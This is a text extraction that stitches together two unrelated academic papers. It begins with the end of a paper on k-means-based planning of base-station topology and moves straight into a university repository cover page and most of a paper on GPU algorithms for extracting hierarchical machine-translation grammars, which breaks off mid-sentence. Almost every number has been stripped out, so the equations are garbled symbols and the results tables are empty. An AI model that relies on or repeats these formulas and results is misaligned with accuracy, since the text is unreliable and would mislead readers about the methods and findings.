simplify the problem, the sector coverage direction of butterfly station is not considered for the moment.  microwave connection is adopted between the host stations, and the maximum communication distance is km.  wireless return connection is adopted between host station and sub-station and between sub- stations.  each sub-station can only have two wireless back links at most.  any sub-station can only belong to one host station, and there is only one path to the host station, and the number of hops contained in the path is less than or equal to .  any host station has and only one satellite responsible for the back transmission. host stations connected by slices can share the same satellite, but a satellite can only bear the back data of eight host stations at most.  in a monolithic host station, there is no upper limit for the total number of host stations, i.e., the constraint conditions are as follows: international journal of advanced network, monitoring and controls volume , no. ,                       ) /( )()( )()( )()( )( )( . xceilz xjsy y ywbly kmxwlx yfx yrx nd fd ts ii wbl ji ji i i  c) establishment of the model based on the above analysis, a lower overall cost model with the highest priority is established as follows: m  zyxinc                      ) /( )()( )()( )()( )( )( . xceilz xjsy y ywbly kmxwlx yfx yrx nd fd ts ii wbl ji ji i i iii. k-means algorithm clustering analysis is an important analysis method in data mining. its goal is to divide the data set into several clusters, so that the similarity of data points within the same cluster is as large as possible, while the similarity of data points between different clusters is as small as possible. the study of clustering algorithms has a long history. hartigan systematically discussed clustering algorithms in his monograph clustering algorithms as early as . since then, the academic circle has proposed a variety of clustering algorithms based on different ideas, mainly including the algorithm based on partition, the algorithm based on hierarchy, the algorithm based on density, the algorithm based on grid and the algorithm based on model. all these algorithms can achieve good clustering effect, among which the k-means algorithm based on partition is the one that is applied most and has a simple algorithm idea. by dealing with the difficult constraints, k-means algorithm makes the solution of the problem relatively easy. the algorithm has a good convergence, and the solution speed of the algorithm can also meet the requirements of real-time. a. processing flow of k-means algorithm: ) for a randomly given set of sites, the samples are divided into k clusters according to the size of the distance between sites. suppose the cluster is divided into ( b , b ,... k b ), then our goal is to minimize the squared error e:      k i bx i i xe    where i is the mean vector of cluster ib , called the center of mass, and the expression is:      ibxi i x b    a suitable k value range of ~ was selected through cross validation. that is, k samples are randomly selected from data sets as the initial k centroid vectors: {  ,  ,... k  ,}. ) take n as the maximum number of iterations. for n = , , ... n. a) classify the cluster b and initialize it as  t b t= , ... k; b) for i = , ... m, calculate sample ix and each centroid vector  (j= , ... k) distance from: jiij xd  , mark ix with the smallest ijd as the corresponding category i , and then update   i xbb ii   ; c) for j = , ,... k, recalculate the new center of mass    jbxj j x b  for all the sample points in jb ; d) if all k centroid vectors do not change, go to step ( ). ) output cluster division  kcccc ,...,  . iv. simulation experiment a. cost modeling experiment the specific steps for solving the model are as follows: international journal of advanced network, monitoring and controls volume , no. , step : use k-means algorithm to conduct data aggregation and violent calculation on difficult constraints, and obtain the upper bound of the original problem and the next one, that is, the solution without considering other constraints will make the overall cost the lowest; step : by solving the lower overall cost model with the highest priority, k-means algorithm is used again to conduct data aggregation for the classified subregions, and considering the solutions of other constraints, the number of host stations in each subregion is obtained; step : if the obtained solution satisfies the optimal solution of the condition, stop the algorithm, add the number in each cell, and the obtained solution is the optimal solution of the problem, otherwise go to step . obtain the topology structure satisfying the constraint conditions through step . take k= and the adjustable radius of the cell is km as an example, as shown in figure . in the figure, the green "o" represents the host station, the blue "*" represents the substation, and the black line segment represents the connection relationship between stations. figure . base station topology step : obtain the minimum cost result output through the overall cost formula for the optimal solution obtained in each subregion. get the result of the lowest cost through step . take k= as an example, and the results are shown in figure - . the number of host stations is , the number of sub stations is and the number of satellites is . the total cost is (wusd) and the average cost is . (w usd). the efficiency of the algorithm is less than minutes, with strong convergence. figure . program run result by contrast the chosen radii are , , and . get the corresponding site distribution, number and total cost. see table . table iii. cost comparison table radius(km) host station child station satellite overall cost(w usd) by comparison, when the cell radius is , the overall cost is the lowest. the minimum cost is (w usd). the larger the radius is, the more points of untreated stations are. however, even if the radius is , there are no stations connected by leakage, which can be ignored. b. path loss modeling experiment according to the simulation result of cost, the connection relation and physical location between host station and sub station are obtained. if only the path loss of the back transmission part of the sub-station is taken into account, and the path loss between the host stations is not taken into account, it only needs to meet the distance limit, and a smaller path loss can be achieved by increasing the number of host stations. when x is the maximum, pl is the minimum, but it also increases the cost required by satellite transmission. if the first and second hop distances are limited, that is, the distance between the sub-station and the host station and between sub-stations is reduced to obtain a lower path loss. if there is only a level sub-station, the number of sub-stations in a international journal of advanced network, monitoring and controls volume , no. , single sector of the host station is required to be less than or equal to , and then the modified sub-station model is deduced in reverse. finally, the scheme with the lowest cost is selected, that is, the optimal solution to the problem. although there is an influence of non-line-of-sight transmission capability (nlos) in wireless return transmission, in order to simplify the problem, the free- space transmission model is adopted to estimate the path loss between stations. the formula is as follows:  )lg( )lg( . fdpl    where, pl is the path loss and the distance between the two stations, d is km, f is the transmission frequency and the unit is mhz, mhz is adopted by default here. the average system cost in apl is equal to the sum of the losses of all wireless back links/the number of wireless back links it should be noted that the path loss only considers the return part of the sub-stations, and the microwave transmission is adopted between the host stations. the loss is not calculated as long as the distance limit is satisfied. by comparison, the first jump/second jump distance combinations were selected as / , / and / , respectively. get the corresponding number of sites and average loss. see table . table iv. number of sites and average wastage first jump/second jump host station child station satellite average loss (db) / . / . / . reducing the distance between the first jump and the second jump can reduce the average loss, so the / jump scheme is the best choice. however, the number of sites not connected to the topology increases, the signal coverage decreases, and the cost is very high. to sum up, if only the cost is considered, the best solution is that when the adjustable constraint radius is km, the overall cost is the lowest, and the lowest cost is (w usd). if only loss is considered, k= , the first jump distance km and the second jump distance km are selected as the best scheme. v. summary in this paper, in the process of achieving the goal, a local optimal model based on k-means algorithm is constructed. by traversal comparison of the site deployment of host station and sub-station under the global large clustering and local small clustering, the lowest cost sub-station scheme is screened out. the establishment of the model adopts the idea of "dividing the whole into zero" and applies the k-means algorithm. due to the scalability and high efficiency of the algorithm itself, it can simply and quickly divide candidate sites into k parts for step-by-step solution, which significantly reduces the amount of calculation and improves the speed of operation. however, because the k value is predetermined, the selection of this k value is very difficult to estimate, and the one- time optimal programming cannot be realized. in addition, due to the clustering division of the overall site, the final solution of the model is always locally optimal, which may be slightly different from the overall optimal solution. therefore, the initial value of k is limited in the modeling process. let k be between and , and solve different k values for many times, so as to obtain the relative optimal solution by comparison. after getting the lower cost of the substation scheme, considering the return path loss of the substation, the established local optimal model is modified from the perspective of reducing the loss. considering the results, microwave connection is adopted between the host stations and no loss is calculated. the average loss of the system is related to the wireless return distance, so the algorithm efficiency is significantly improved by limiting the distance between stations. however, the limitation of this model lies in the increase of host station and the increase of overall cost. although it is beneficial to the service quality of users, it increases the cycle of investment return, which is not in line with the original intention of operators. in order to take into account the interests of operators, follow-up can be adjusted according to the situation. references [ ] ma liang . wireless relay transmission technology in the micro base station deployment strategy [j]. journal of mobile communications, , ( ) : to . [ ] li xin, peng xiongen. deployment and application of relay technology in lte network [j]. mobile communications, , ( ): - . international journal of advanced network, monitoring and controls volume , no. , [ ] deng shuifa. research on los/nlos communication environment identification and nlos error elimination technology [d]. southwest jiaotong university, . [ ] wang bo. wideband lineless communication system in nlos field scene without apparent distance [j]. digital communication world, ( ): - . [ ] liu sen. analysis on the return rate of investment in enterprise cloud computing information [j]. china science and technology bbs, ( ): - . [ ] zhang yong-jun, yao zhi-cong, wang jing, li hua-hua. capacitor voltage balance control strategy of a cascade h-bridge static reactive power generator [j]. chinese journal of electrical engineering, , ( ): - . [ ] wu huayi, liu bo, li dajun, ling nanyan. research review on topological relations of spatial objects [j]. journal of wuhan university (information science edition), , ( ): - . [ ] shi langyu, ma ling. application of relay wireless back transmission technology in td-lte networking scheme [j]. telecommunications engineering technology and standardization, , ( ): - . [ ] xie j y, gao h c. selection algorithm based on statistical correlation and k-means to distinguish gene subset [j]. journal of software, ( ): - . (in chinese) [ ] zuo l, he y g, li b, zhu y q, fang g f. research on path loss of passive uhf rfid system [j]. acta phys. sin, , ( ): - . (in chinese) [ ] jia h j, ding s f, shi z z. approximate weighted kernel k-means algorithm for solving large-scale spectral clustering [j]. journal of software, , ( ): - . (in chinese ) edinburgh research explorer gappy pattern matching on gpus for on-demand extraction of hierarchical translation grammars citation for published version: he, h, lin, j & lopez, a , 'gappy pattern matching on gpus for on-demand extraction of hierarchical translation grammars', transactions of the association for computational linguistics, vol. , pp. - . <https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/gappy-pattern-matching-on-gpus-for-ondemand-extraction-of-hierarchical-translation-grammars(f f c d- - - beb- b ace ).html gappy pattern matching on gpus for on-demand extraction of hierarchical translation grammars hua he dept. of computer science university of maryland college park, maryland huah@cs.umd.edu jimmy lin the ischool and umiacs university of maryland college park, maryland jimmylin@umd.edu adam lopez school of informatics university of edinburgh edinburgh, united kingdom alopez@inf.ed.ac.uk abstract grammars for machine translation can be materialized on demand by finding source phrases in an indexed parallel corpus and extracting their translations. this approach is limited in practical applications by the computational expense of online lookup and extraction. for phrase-based models, recent work has shown that on-demand grammar extraction can be greatly accelerated by parallelization on general purpose graphics processing units (gpus), but these algorithms do not work for hierarchical models, which require matching patterns that contain gaps. we address this limitation by presenting a novel gpu algorithm for on-demand hierarchical grammar extraction that is at least an order of magnitude faster than a comparable cpu algorithm when processing large batches of sentences. in terms of end-to-end translation, with decoding on the cpu, we increase throughput by roughly two thirds on a standard mt evaluation dataset. the gpu necessary to achieve these improvements increases the cost of a server by about a third. we believe that gpu-based extraction of hierarchical grammars is an attractive proposition, particularly for mt applications that demand high throughput. introduction most machine translation systems extract a large, fixed translation model from parallel text that is accessed from memory or disk. an alternative is to store the indexed parallel text in memory and extract translation units on demand only when they are needed to decode new input. this architecture has several advantages: it requires only a few gigabytes to represent a model that would otherwise require a terabyte (lopez, b). it can adapt incrementally to new training data (levenberg et al., ), mak- ing it useful for interactive translation (gonzález- rubio et al., ). it supports rule extraction that is sensitive to the input sentence, enabling leave-one- out training (simianer et al., ) and the use of sentence similarity features (philips, ). on-demand extraction can be slow, but for phrase-based models, massive parallelization on general purpose graphics processing units (gpus) can dramatically accelerate performance. he et al. ( ) demonstrated orders of magnitude speedup in exact pattern matching with suffix arrays, the algorithms at the heart of on-demand extraction (callison-burch et al., ; zhang and vogel, ). however, some popular translation models use “gappy” phrases (chiang, ; simard et al., ; galley and manning, ), and the gpu algorithm of he et al. does not work for these models since it is limited to contiguous phrases. instead, we need pattern matching and phrase extraction that is able to handle variable-length gaps (lopez, ). this paper presents a novel gpu algorithm for on-demand extraction of hierarchical translation models based on matching and extracting gappy phrases. our experiments examine both grammar extraction and end-to-end translation, comparing quality, speed, and memory use. we compare against the gpu system for phrase-based translation by he et al. ( ) and cdec, a state-of-the-art transactions of the association for computational linguistics, vol. , pp. – , . action editor: david chiang. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. cpu system for hierarchical translation (dyer et al., ). our system outperforms the former on translation quality by . bleu (replicating previously-known results) and outperforms the latter on speed, improving grammar extraction throughput by at least an order of magnitude on large batches of sentences while maintaining the same level of translation quality. our contribution is to show, complete with an open-source implementation, how gpus can vastly increase the speed of hierarchical grammar extraction, particularly for high-throughput mt applications. algorithms gpu architectures, which are optimized for mas- sively parallel operations on relatively small streams of data, strongly influence the design of our algo- rithms, so we first briefly review some key proper- ties. our nvidia tesla k c gpu (kepler gen- eration) provides thread processors (cuda cores), and computation proceeds concurrently in groups of threads called warps. each thread in a warp carries out identical instructions in lockstep. when a branching instruction occurs, only threads meeting the branch condition execute, while the rest idle—this is called warp divergence and is a source of poor performance. consequently, gpus are poor at “irregular” computations that involve conditionals, pointer manipulation, and complex execution sequences. our pattern matching algorithm is organized around two general design principles: brute force scans and fine-grained parallelism. brute force array scans avoid warp divergence since they access data in regular patterns. rather than parallelize larger algorithms that use these scans as subroutines, we parallelize the scans themselves in a fine-grained manner to obtain high throughput. the relatively small size of the gpu memory also affects design decisions. data transfer between the gpu and the cpu has high latency, so we want to avoid shuffling data as much as possible. to accomplish this, we must fit all our data structures into the gb memory available on our particular gpu. as we will show, this requires some tradeoffs in addition to careful design of algorithms and associated data structures. . translation by pattern matching lopez ( b) provides a recipe for “translation by pattern matching” that we use as a guide for the remainder of this paper (algorithm ). algorithm translation by pattern matching : for each input sentence do : for each phrase in the sentence do : find its occurrences in the source text : for each occurrence do : extract any aligned target phrase : for each extracted phrase pair do : compute feature values : decode as usual using the scored rules we encounter a computational bottleneck in lines – , since there are many query phrases, matching occurrences, and extracted phrase pairs to process. below, we tackle each challenge in turn. to make our discussion concrete, we will use a toy english-spanish translation example. at line we search for phrases in the source side of a parallel text. suppose that it contains two sentences: it makes him and it mars him, and it sets him on and it takes him off. we map each unique word to an integer id, and call the resulting array of integers that encodes the source text under this transformation the text t . let |t| denote the total number of tokens, t[i] denote its ith element, and t[i]...t[j] denote the substring starting with its ith element and ending with its jth element. since t encodes multiple sentences, we use special tokens to denote the end of a sentence and the end of the corpus. in our example we use # and $, respectively, as shown in figure . now suppose we want to translate the sentence it persuades him and it disheartens him. we encode it under the same mapping as t and call the resulting array the query q. our goal is to materialize all of the hierarchical phrases that could be used to translate q based on training data t . our algorithm breaks this process into a total of distinct passes, each performing a single type of computation in parallel. five of these passes are based on the algorithm described by he et al. ( ), and we review them for completeness. the nine new passes are identified as such. i t[i] # it makes him and it mars him # it sets him on and it takes him off # $ st [i] suffix st [i]: t[st [i]]...t[|t|] and it mars him # it sets him on and it takes him off # $ and it takes him off # $ him and it mars him # it sets him on and it takes him off # $ him off # $ him on and it takes him off # $ him # it sets him on and it takes him off # $ it makes him and it mars him # it sets him on and it takes him off # $ it mars him # it sets him on and it takes him off # $ it sets him on and it takes him off # $ it takes him off # $ makes him and it mars him # it sets him on and it takes him off # $ mars him # it sets him on and it takes him off # $ off # $ on and it takes him off # $ sets him on and it takes him off # $ takes him off # $ # it makes him and it mars him # it sets him on and it takes him off # $ # it sets him on and it takes him off # $ # $ $ figure : example text t (showing words rather than than their integer encodings for clarity) and suffix array st with corresponding suffixes. . finding every phrase line of algorithm searches t for all occurrences of all phrases in q. we call each phrase a pattern, and our goal is to find all phrases of t that match each pattern, i.e., the problem of pattern matching. our translation model permits phrases with at most two gaps, so q is a source of o(|q| ) patterns, since there are up to six possible subphrase boundaries. passes - : finding contiguous patterns to find contiguous phrases (patterns without gaps), we use the algorithm of he et al. ( ). it requires a suffix array (manber and myers, ) computed from t . the ith suffix of a -indexed text t is the substring t[i]...t[|t |] starting at position i and continuing to the end of t . the suffix array st is a permutation of the integers , ..., |t | ordered by a lexicographic sort of the corresponding suffixes (figure ). given st , finding a pattern p is simply a matter of binary search for the pair of integers (`,h) such that for all i from ` to h, p is a prefix of the st [i]th suffix of t . thus, each integer st [i] identifies a unique match of p . in our example, the pattern it returns ( , ), corresponding to matches at positions , , , and ; while him and it returns ( , ), corresponding to a match at position . a longest common prefix (lcp) array enables us to find h or ` in o(|q|+ log |t|) comparisons (manber and myers, ). every substring of q is a contiguous pattern, but if we searched t for all of them, most searches would fail, wasting computation. instead, he et al. ( ) use two passes. the first computes, concurrently for every position i in , ..., |q|, the endpoint j of the longest substring q[i]...q[j] that appears in t . it also computes the suffix array range of the one- word substring q[i]. taking this range as input, for all k from i to j the second pass concurrently queries t for pattern q[i]...q[k]. this pass uses two concurrent threads per pattern—one to find the lowest index of the suffix array range, and one to find the highest index. passes - : finding one-gap patterns (new) passes and find contiguous phrases, but we must also find phrases that contain gaps. we use the special symbol ? to denote a variable-length gap. the set of one-gap patterns in q thus consists of q[i]...q[j] ? q[i′]...q[j′] for all i, j, i′, and j′ such that i ≤ j < i′ − and i′ ≤ j′. when the position in q is not important we use strings u, v, and w to denote contiguous patterns; for example, u ? v denotes an arbitrary one-gap pattern. we call the contiguous strings u and v of u ? v its subpatterns, e.g., it ? him is a pattern with subpatterns it and him. when we search for a gappy pattern, ? can match any non-empty substring of t that does not contain $ or #. such a match may not be uniquely identified by the index of its first word, so we specify it with a tuple of indices, one for the match of each subpattern. pattern it ? him has six matches in t : ( , ), ( , ), ( , ), ( , ), ( , ), and ( , ). passes and search t for all one-gap patterns using the novel gpu algorithm described below. a pattern u ? v cannot match in t unless both u and v match in t , so we use the output of pass , which returns all (i,j) pairs such that q[i]...q[j] matches in t . concurrently for every such i and j, pass enumerates all i′ and j′ such that j < i′ − and q[i′]...q[j′] matches in t , returning each pattern q[i]...q[j] ? q[i′]...q[j′]. pass then sorts and deduplicates the combined results of all threads to obtain a set of unique patterns. these operations are carried out on the gpu using the algorithms of hoberock and bell ( ). pass searches for matches of each pattern iden- tified by pass . we first illustrate with it ? him. pass associates it with suffix array range ( , ). a linear scan of st in this range reveals that it matches at positions , , , and in t . likewise, him maps to range ( , ) of st and matches at , , , and in t . concurrently for each match of the less frequent subpattern, we scan t to find matches of the other subpattern until reaching a sentence boundary or the maximum phrase length, an idea we borrow from the cpu implementation of baltescu and blunsom ( ). in our example, both it and him occur an equal number of times, so we arbitrarily choose one—suppose we choose it. we assign each of positions , , , and to a separate thread. the thread assigned position scans t for matches of him until the end of sentence at position , finding matches ( , ) and ( , ). as a second example, consider it ? and. in this case, it has four matches, but and only two. so, we need only two threads, each scanning backwards from matches of and. since most patterns are infrequent, allocating threads this way minimizes work. however, very large corpora contain one-gap patterns for which both subpatterns are frequent. we simply precompute all matches for these patterns and retrieve them at runtime, as in lopez ( ). this precomputation is performed once given t and therefore it is a one-time cost. materializing every match of u ? v would con- sume substantial memory, so we only emit those for which a translation of the substring matching ? is extractable using the check in § . . the success of this check is a prerequisite for extracting the translation of u ? v or any pattern containing it, so pruning in this way conserves gpu memory without affecting the final grammar. passes - : finding two-gap patterns (new) we next find all patterns with two gaps of the form u?v ?w. the search is similar to passes and . in pass , concurrently for every pattern u ? v matched in pass , we enumerate the pattern u?v?w for every w such that u?v?w is a pattern in q and w matched in pass . in pass , concurrently for every match (i,j) of u?v for every u?v ?w enumerated in pass , we scan t from position j + |v| + for matches of w until we reach the end of sentence. as with the one-gap patterns, we apply the extraction check on the second ? of the two-gap patterns u ? v ? w to avoid needlessly materializing matches that will not yield translations. . extracting every target phrase in line of algorithm we must extract the aligned translation of every match of every pattern found in t . efficiency is crucial since some patterns may occur hundreds of thousands of times. we extract translations from word alignments using the consistency check of och et al. ( ). a pair of substrings is consistent only if no word in either substring is aligned to any word outside the pair. for example, in figure the pair (it sets him on, los excita) is consistent. the pair (him on and, los excita y) is not, because excita also aligns to the words it sets. only consistent pairs can be lo s ex ci ta y lo s pa ra li za l r p # it sets him on and it takes him off l′ r′ figure : an example alignment and the corre- sponding l, r, p , l′ and r′ arrays. translations of each other in our model. given a specific source substring, our algorithm asks: is it part of a consistent pair? to answer this question, we first compute the minimum target substring to which all words in the substring align. we then compute the minimum substring to which all words of this candidate translation align. if this substring matches the input, the candidate transla- tion is returned; otherwise, extraction fails. for example, it sets him on in range ( , ) aligns to los excita in range ( , ), which aligns back to ( , ). so this is a consistent pair. however, him on and in range ( , ) aligns to los excita y in range ( , ), which aligns back to it sets him on and at ( , ). so him on and is not part of a consistent pair and has no extractable translation. to extract gappy translation units, we subtract consistent pairs from other consistent pairs (chiang, ). for example, (him, los) is a consistent pair. subtracting it from (it sets him on, los excita) yields the translation unit (it sets ? on, ? excita). our basic building block is the extract func- tion of he et al. ( ), which performs the above check using byte arrays denoted l, r, p , l′, and r′ (figure ) to identify extractable target phrases in target text t ′. when t[i] is a word, l[i] and r[i] store the sentence-relative positions of the leftmost and rightmost words it aligns to in t ′, and p[i] stores t[i]’s sentence-relative position. when t[i] is a sentence boundary, the concatenation of bytes l[i], r[i], and p [i], denoted lrp[i], stores the position of the corresponding sentence in t ′. bytes l′[i′] and r′[i′] store the sentence-relative positions of the leftmost and rightmost words t ′[i′] aligns to. we first calculate the start position p of the source sentence containing t[i]...t[j], and the start posi- tion p′ of the corresponding target sentence: p = i−p [i] p′ = lrp[p] we then find target indices i′ and j′ for the candidate translation t ′[i′]...t ′[j′]: i′ = p′ + min k∈i,...,j l[k] j′ = p′ + max k∈i,...,j r[k] we can similarly find the translation t[i′′]...t[j′′] of t ′[i′]...t ′[j′]: i′′ = p + min k′∈i′,...,j′ l′[k′] j′′ = p + max k′∈i′,...,j′ r′[k′] if i = i′′ and j = j′′, extract(i,j) returns (i′,j′), the position of t[i]...t[j]’s translation. otherwise the function signals that there is no extractable translation. given this function, extraction proceeds in three passes. pass : extracting contiguous patterns each match of pattern u is assigned to a concurrent thread. the thread receiving the match at position i returns the pair consisting of u and its translation according to extract(i, i + |u| − ), if any. it also returns translations for patterns in which u is the only contiguous subpattern: ? u, u ?, and ? u ?. we extract translations for these patterns even if u has no translation itself. to see why, suppose that we reverse the translation direction of our example. in figure , excita is not part of a consistent pair, but both ? excita and ? excita ? are. consider ? u. since ? matches any substring in t without boundary symbols, the leftmost position of ? u is not fixed. so, we seek the smallest match with an extractable translation, returning its translation with the following algorithm. : k ← i : while t[k − ] = # do : k ← k − : if extract(k,i + |u|− ) succeeds then : (i′,j′) ← extract(k,i + |u|− ) : if extract(k,i− ) succeeds then : (p′,q′) ← extract(k,i− ) : return t ′[i′]...t ′[p′] ? t ′[q′]...t ′[j′] : if t[k − ] = # then : return failure the case of u ? is symmetric. we extend this algorithm to handle ? u ?. the extension considers increasingly distant pairs (k,`) for which ? u ? matches t[k]...t[`], until it either finds an extractable translation, or it encounters both sentence boundaries and fails. pass : extracting one-gap patterns (new) in this pass, each match of pattern u ? v is assigned to a thread. the thread receiving match (i,j) attempts to assign i′,j′,p′ and q′ as follows. (i′,j′) = extract(i,j + |v|− ) (p′,q′) = extract(i + |u|,j − ) if both calls succeed, we subtract to obtain the translation t ′[i′]...t ′[p′] ?t ′[q′]...t ′[j′]. we extract translations for ? u ? v and u ? v ?, using the same algorithm as in pass . pass : extracting two-gap patterns (new) in this pass, we extract a translation for each match of u ? v ? w concurrently, using a straightforward extension of the subtraction algorithm in pass . since we only need patterns with up to two gaps, we do not consider other patterns. to optimize gpu performance, for the passes above, we assign all matches of a gappy pattern to the same thread block. this allows threads in the same thread block to share the same data during initialization, therefore improving memory access coherence. . computing every feature in line of algorithm we compute features of every extracted phrase pair. we use α and β to denote arbitrary strings of words and ? symbols, and our input is a multiset of (α,β) pairs collected by passes - , which we denote by Π. we compute the following features for each unique (α,β) pair. log-count features. we need two aggregate statis- tics: the count of (α,β) in Π, and the count of all pairs in Π for which α is the source pattern. we then compute the two features as log( + count(α,β)) and log( + count(α)). translation log-probability. given the aggregate counts above, this feature is log count(α,β)count(α) . singleton indicators. we compute two features, to indicate whether (α,β) occurs only once, i.e., count(α,β) = , and whether α occurs only once, i.e., count(α) = . lexical weight. consider word pairs a,b with a ∈ α, b ∈ β, and neither a nor b are ?. given a global word translation probability table p(a|b), which is exter- nally computed from the word alignments directly, the feature is ∑ a∈α maxb∈β log p(a|b). since Π is the result of parallel computation, we must sort it. we can then compute aggregate statis- tics by keeping running totals in a scan of the sorted multiset. with many instantiated patterns, we would quickly exhaust gpu memory, so this sort is performed on the cpu. we compute the log-count features, translation log-probability, and singleton indicators this way. however, the lexical weight feature is a function only of the aligned translation pair itself and corresponding word-level translation possibilities calculated externally from word alignment. thus, the computation of this feature can be parallelized on the gpu. so, we have multiple feature extraction passes based on the number of gaps: pass (cpu): one-gap features (new). pass (cpu): two-gap features (new). pass (cpu): contiguous features. pass (gpu): lexical weight feature (new). . sampling in serial implementations of on-demand extraction, very frequent patterns are a major computational bottleneck (callison-burch et al., ; lopez, b). thus, for patterns occurring more than n times, for some fixed n (typically between and ), these implementations deterministically sample n matches, and only extract translations of these matches. to compare with these implementations, we also implement an optional sampling step. though we use the same sampling rate, the samples themselves are not the same, since our extraction checks in passes and alter the set of matches that are actually enumerated, thus sampled from. the cpu algorithms do not use this check. experimental setup we tested our algorithms in an end-to-end chinese- english translation task using data conditions simi- lar to those of lopez ( b) and he et al. ( ). our implementation of hierarchical grammar extrac- tion on the gpu, as detailed in the previous section, is written in c, using cuda library v . and gcc v . , compiled with the -o optimization flag. our code is open source and available for researchers to download and try out. hardware. we used nvidia’s tesla k c gpu (kepler generation), which has cuda cores and gb memory, with a peak memory bandwidth of gb/s. the server hosting the gpu has two intel xeon e - cpus, each with eight cores at . ghz (a total of physical cores; logical cores with hyperthreading). both were released in and represent comparable generation hardware technology. all gpu and cpu experiments were conducted on the same machine, which runs red hat enterprise linux (rhel) . training data. we used two training sets: the first consists of news articles from the xinhua agency, with million words of chinese (around one mil- lion sentences). the second adds parallel text from the united nations, with million words of chi- nese (around four million sentences). test data. for performance evaluations, we ran tests on sentence batches of varying sizes: , , k, k, k, k, k, k and k. these sentences are drawn from the nist – mt evaluations (on average words each) and then the chinese side of the hong kong parallel text (ldc t ) when the nist data are smaller than the target batch http://hohocode.github.io/cgx/ size. large batch sizes are necessary to saturate the processing power of the gpu. the size of the complete batch of k test sentences is kb. baselines. we compared our gpu implementa- tion for on-demand extraction of hierarchical gram- mars against the corresponding cpu implementa- tion (lopez, a) found in pycdec (chahuneau et al., ), an extension of cdec (dyer et al., ). we also compared our gpu algorithms against moses (koehn et al., ), representing a standard phrase-based smt baseline. phrase tables generated by moses are essentially the same as the gpu implementation of on-demand extraction for phrase-based translation by he et al. ( ). results . translation quality we first verified that our gpu implementation achieves the same translation quality as the corresponding cpu baseline. this is accomplished by comparing system output against the baseline systems, training on xinhua, tuning on nist , and testing on nist . in all cases, we used mira (chiang, ) to tune parameters. we ran experiments three times and report the average as recommended by clark et al. ( ). hierarchical grammars were extracted with sampling at a rate of ; we also bound source patterns at a length of and matches at a length of . for moses we used default parameters. our bleu scores, shown in table , replicate well-known results where hierarchical models out- perform pure phrase-based models on this task. the difference in quality is partly because the phrase- based baseline system does not use lexicalized re- ordering, which provides similar improvements to hierarchical translation (lopez, b). such lex- icalized reordering models cannot be produced by the gpu-based system of he et al. ( ). this establishes a clear translation quality improvement between our work and that of he et al. ( ). the chahuneau et al. ( ) implementation is in cython, a language for building python applications with performance- critical components in c. all of the pattern matching code that we instrumented for these experiments is compiled to c/c++. the implementation is a port of the original code written by lopez ( a) in pyrex, a precursor to cython. much of the code is unchanged. http://hohocode.github.io/cgx/ system bleu moses phrase-based baseline . hierarchical with online cpu extraction . hierarchical with online gpu extraction . table : comparison of translation quality. the hierarchical system is cdec. online cpu extraction is the baseline, part of the standard cdec package. online gpu extraction is this work. we see that the bleu score obtained by our gpu implementation of hierarchical grammar extraction is nearly identical to cdec’s, evidence that our im- plementation is correct. the minor differences in score are due to non-determinism in tuning and the difference in sampling algorithms (§ . ). . extraction speed next, we focus on the performance of the hierar- chical grammar extraction component, comparing the cpu and gpu implementations. for both implementations, our timings include preparation of queries, pattern matching, extraction, and feature computation. for the gpu implementation, we include the time required to move data to and from the gpu. we do not include time for construction of static data structures (suffix arrays and indexes) and initial loading of the parallel corpus with alignment data, as those represent one-time costs. note that the cpu implementation includes indexes for frequent patterns in the form u ? v and u ? v ? w, while our gpu implementation indexes only the former. we compared performance varying the number of queries, and following lopez ( a), we compared sampling at a rate of against runs without sam- pling. our primary evaluation metric is throughput: the average number of processed words per second (i.e., batch size in words divided by total time). we first establish throughput baselines on the cpu, shown in table . experiments used different numbers of threads under different data conditions (xinhua or xinhua + un), with and without sam- pling. our server has a total of physical cores, but supports logical cores via hyperthreading. we obtained the cpu sampling results by running cdec over k query sentences. for the non-sampling runs, since the throughput is so low, we measured +sampling −sampling threads x x+u x x+u . . . . . . . . . . . . table : cpu extraction performance (throughput in words/second) using different numbers of threads under different data conditions (x: xinhua, x+u: xinhua+un), with and without sampling. performance over . k sentences for xinhua and sentences for xinhua + un. we see that throughput scaling is slightly less than linear: with sampling, using threads increases throughput by × on the xinhua data (compared to a single thread) and . × on xinhua + un data. going from to threads further increase throughput by %- % and saturates the processing capacity of our server. the thread condition provides a fair baseline for comparing the performance of the gpu implementation. table shows gpu hierarchical grammar extraction performance in terms of throughput (words/second); these results are averaged over three trials. we varied the number of query sentences, and in each case, also report the speedup with respect to the cpu condition with threads. gpu throughput increases with larger batch sizes because we are increasingly able to saturate the gpu and take full advantage of the massive parallelism it offers. we do not observe this effect on the cpu since we saturate the processors early. with a batch size of sentences, the gpu is slightly slower than the -thread cpu imple- mentation on xinhua and faster on xinhua + un, both with sampling. without sampling, the gpu is already an order of magnitude faster at a batch size of sentences. at a batch size of sentences, the gpu implementation is substantially faster than the -thread cpu version across all conditions. with the largest batch size in our exper- iments of k sentences, the gpu is over an order of magnitude faster than the fully-saturated cpu with sampling, and over two orders of magnitude faster without sampling. although previous work does not show decreased translation quality due batch size number of sentences k k k k k k k number of tokens . k . k . k . k . k . k . k . k . k + s am pl in g xinhua throughput (words/s) speedup . × . × . × . × . × . × . × . × . × xinhua+un throughput (words/s) speedup . × . × . × . × . × . × . × . × . × − s am pl in g xinhua throughput (words/s) speedup × × × × × × × × × xinhua+un throughput (words/s) speedup × × × × × × × × × table : gpu grammar extraction throughput (words/second) under different batch sizes, data conditions, with and without sampling. speedup is computed with respect to the cpu baseline running on threads. +sampling −sampling x x+u x x+u gpu one-by-one . . . . cpu single-thread . . . . table : sentence-by-sentence gpu grammar extraction throughput (words/second) vs. a single thread on the cpu (x: xinhua, x+u: xinhua + un). to sampling (callison-burch et al., ; lopez, b), these results illustrate the raw computa- tional potential of gpus, showing that we can elim- inate heuristics that make cpu processing tractable. we believe future work can exploit these untapped processing cycles to improve translation quality. how does the gpu fare for translation tasks that demand low latency, such as sentence-by-sentence translation on the web? to find out, we 